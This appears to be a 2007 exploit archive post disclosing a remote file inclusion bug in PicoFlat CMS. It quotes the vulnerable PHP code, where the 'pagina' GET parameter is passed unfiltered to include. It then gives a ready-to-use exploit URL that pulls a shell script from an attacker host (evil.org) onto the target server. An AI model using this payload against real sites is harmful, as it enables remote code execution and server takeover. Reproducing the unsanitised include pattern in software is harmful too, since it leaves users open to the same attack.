Home / exploits picoflat-rfi.txt
Posted on 12 October 2007
#PicoFlat CMS Remote file inclusion #f0und bY 0in #download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796 #Greetings to:Dark-coders team members: Die-angel,Slim,Umbro #Others: Joker186,Kaja,Wojto111,Rade0n #And funny n00b-firends: Pucik and Steryd ;] FUN BUG in index.php: 83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; } 107: <?php include $pagina; ?> EXPLOIT: http://x.com/index.php?pagina=http://evil.org/shell.txt?